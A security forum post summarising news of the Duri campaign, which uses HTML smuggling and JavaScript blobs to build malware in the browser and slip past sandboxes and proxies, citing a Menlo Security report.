Duri campaign smuggles malware via HTML and JavaScript

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,052
A new attack campaign uses a combination of HTML smuggling techniques and data blobs to evade detection and download malware.

Dubbed Duri, the campaign exploits the JavaScript blob method which generates the malicious file in the web browser, thus avoiding detection by sandboxes and proxies.

"Traditional network security solutions such as proxies, firewalls, and sandboxes rely on the transfer of objects over the wire. For example, a sandbox might extract file objects such as .exe, .zip, and other suspicious objects from the wire and then send them to the sandbox for detonation," reads a report published by Menlo Security.
The company's detailed analysis of the Duri campaign along with the Zero Trust detection approach used and a long list of Indicators of Compromise (IoCs) related to the campaign are provided in their report.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top